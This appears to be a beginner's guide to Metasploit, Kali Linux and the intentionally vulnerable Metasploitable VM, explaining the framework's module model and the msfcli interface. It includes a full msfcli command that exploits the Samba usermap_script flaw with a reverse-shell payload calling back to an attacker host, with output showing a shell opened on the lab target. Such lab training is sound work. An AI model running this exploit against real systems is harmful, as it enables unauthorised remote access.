Metasploit framework for hackers and pentesters guide
What is Metasploit?
The Metasploit Framework (MSF) is far more than just a collection of exploits; it is also a solid foundation that you can build upon and easily customize to meet your needs. This allows you to concentrate on your unique target environment and not have to reinvent the wheel.
Metasploit is one of the single most useful security auditing tools freely available to security professionals today. Extending all the way to network information gathering tools and web vulnerability plugins, the Metasploit Framework provides a truly impressive work environment. Also, when speaking about Metasploit, we can't forget to speak about Kali Linux.
Kali Linux is a Debian-based Linux distribution aimed at advanced Penetration Testing and Security Auditing. It contains several hundred tools that are geared towards various information security tasks, such as Penetration Testing, Security research, Computer Forensics, and Reverse Engineering.
Kali Linux is developed, funded, and maintained by Offensive Security, a leading information security training company.
What is Metasploitable?
Metasploitable is an intentionally vulnerable Linux virtual machine that can be used to conduct security training, test security tools, and practice common penetration testing techniques.
The VM will run on any recent VMware product and on other virtualization technologies such as VirtualBox.
You can download the image file of Metasploitable 2 from SourceForge. Once you have downloaded the Metasploitable VM, extract the zip file, open up the .vmx file using your VMware product of choice, and power it on. Then after a brief time, the system will be booted and ready for action. The default login and password is msfadmin:msfadmin.
Metasploit is written in Ruby and has been in development for many years. One can more easily understand the Metasploit architecture by taking a look under its hood.
In learning how to use Metasploit, take some time to make yourself familiar with its filesystem and libraries. In Kali Linux, Metasploit is provided in the metasploit-framework package and is installed in the /usr/share/metasploit-framework directory, the top-level of which is shown below.
METASPLOIT OBJECT MODEL
In the Metasploit Framework, all modules are Ruby classes.
- Modules inherit from the type-specific class
- The type-specific class inherits from the Msf::Module class
- There is a shared common API between modules
Payloads are slightly different.
- Payloads are created at runtime from various components
- Glue together stagers with stages
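A toy Ruby sketch of the object model listed above, added here as an illustration and not taken from Metasploit's source: the `ToyMsf` namespace and every class, method and option flag in it are hypothetical. It shows the inheritance chain, the API shared across module types, and a payload class assembled at runtime from a stager and a stage.

```ruby
# Toy model only: all names under ToyMsf are hypothetical, not Metasploit code.
module ToyMsf
  # Common base class: every module type shares this API.
  class Module
    class << self
      attr_reader :registered
      # Record option names for this class; value = true when required.
      def register_options(opts)
        @registered = (@registered || {}).merge(opts)
      end
      # Walk the ancestor chain so subclasses inherit their parents' options.
      def all_options
        ancestors.select { |a| a.respond_to?(:registered) }
                 .reverse
                 .reduce({}) { |acc, a| acc.merge(a.registered || {}) }
      end
    end

    attr_reader :datastore
    def initialize; @datastore = {}; end
    # Module type is taken from the type-specific parent class.
    def type; self.class.superclass.name.split('::').last.downcase; end
    # Shared validation: required options that have not been set yet.
    def missing_options
      self.class.all_options.select { |k, req| req && !datastore.key?(k) }.keys
    end
  end

  # Type-specific classes inherit from the common base.
  class Exploit < Module;   register_options('RHOST' => true, 'RPORT' => true); end
  class Auxiliary < Module; register_options('RHOSTS' => true); end
  class Payload < Module;   register_options('LHOST' => true); end

  # A concrete module inherits from its type-specific class.
  class SampleExploit < Exploit; register_options('VERBOSE' => false); end

  # Stager and stage are separate components, glued together at runtime.
  module ReverseTcpStager; def connection; 'reverse_tcp'; end; end
  module ShellStage;       def session;    'shell';       end; end

  # Build an anonymous payload class from one stager and one stage.
  def self.build_payload(stager, stage)
    Class.new(Payload) do
      include stager
      include stage
      define_method(:refname) { "#{session}/#{connection}" }
    end
  end
end
```

The payload class returned by `build_payload` has no constant name of its own, which is the point: it exists only as the combination of the two components passed in.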
There are many different interfaces to use with this hacking tool, each with its own strengths and weaknesses. There is no one perfect interface to use with the Metasploit console, although the MSFConsole is the only supported way to access most Metasploit commands.
It is still beneficial, however, to be comfortable with all Metasploit interfaces.
What is the MSFcli?
The msfcli provides a powerful command-line interface to the framework. This allows you to easily add Metasploit exploits into any scripts you may create.
Command Line Interface Commands
For msfcli help, type msfcli -h.
Note: when using msfcli, variables are assigned using the “equal to” operator (=), and all options are case-sensitive.
    root@kali:~# msfcli exploit/multi/samba/usermap_script RHOST=172.16.194.172 PAYLOAD=cmd/unix/reverse LHOST=172.16.194.163 E
    [*] Please wait while we load the module tree...
           =[ metasploit v4.5.0-dev [core:4.5 api:1.0]
    + -- --=[ 936 exploits - 500 auxiliary - 151 post
    + -- --=[ 252 payloads - 28 encoders - 8 nops
           =[ svn r15767 updated today (2012.08.22)
    RHOST => 172.16.194.172
    PAYLOAD => cmd/unix/reverse
    [*] Started reverse double handler
    [*] Accepted the first client connection...
    [*] Accepted the second client connection...
    [*] Command: echo cSKqD83oiquo0xMr;
    [*] Writing to socket A
    [*] Writing to socket B
    [*] Reading from sockets...
    [*] Reading from socket B
    [*] B: "cSKqD83oiquo0xMr\r\n"
    [*] Matching...
    [*] A is input...
    [*] Command shell session 1 opened (172.16.194.163:4444 -> 172.16.194.172:57682) at 2012-06-14 09:58:19 -0400
    uname -a
    Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
If you aren’t entirely sure about what options belong to a particular module, you can append the letter O to the end of the string at whichever point you are stuck.
    root@kali:~# msfcli exploit/multi/samba/usermap_script O
    [*] Initializing modules...
       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       RHOST                   yes       The target address
       RPORT  139              yes       The target port
To display available payloads for the current module, append the letter P to the msfcli command line string.
    root@kali:~# msfcli exploit/multi/samba/usermap_script P
    [*] Initializing modules...
Benefits of the MSFcli Interface
- Supports the launching of exploits and auxiliary modules
- Useful for specific tasks
- Good for learning
- Convenient to use when testing or developing a new exploit
- Good tool for one-off exploitation
- Excellent if you know exactly which exploit and options you need
- Wonderful for use in scripts and basic automation
The only real drawback of msfcli is that it is not supported quite as well as msfconsole and it can only handle one shell at a time, making it rather impractical for client-side attacks.
It also doesn’t support any of the advanced automation features of msfconsole.
Congratulations, you have reached the end. Hopefully you now know what Metasploit is. If you have a question, don't keep it to yourself; share it with us. For more information, go to the Offensive Security official page.